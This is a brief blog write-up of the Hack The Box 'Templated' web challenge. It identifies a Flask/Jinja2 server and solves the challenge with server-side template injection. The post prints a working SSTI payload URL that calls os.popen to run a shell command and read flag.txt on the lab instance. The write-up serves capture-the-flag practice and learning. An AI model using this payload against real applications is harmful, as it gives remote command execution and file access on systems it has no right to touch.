5
(4)

First of all start the instance

Hackthebox templated web challenge quick writeup

On visiting the host we see flask/jinja2.

Hackthebox templated web challenge quick writeup

So I searched for the exploit .

Hackthebox templated web challenge quick writeup

Checking for SSTI

Hackthebox templated web challenge quick writeup

Got an article about SSTI

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

Hackthebox templated web challenge quick writeup
http://165.22.124.155:31361/%7B%7Brequest.application.globals.builtins.import('os').popen('cat%20flag.txt').read()%7D%7D
Hackthebox templated web challenge quick writeup

And we got the flag successfully..

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 4

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Reply

Your email address will not be published. Required fields are marked *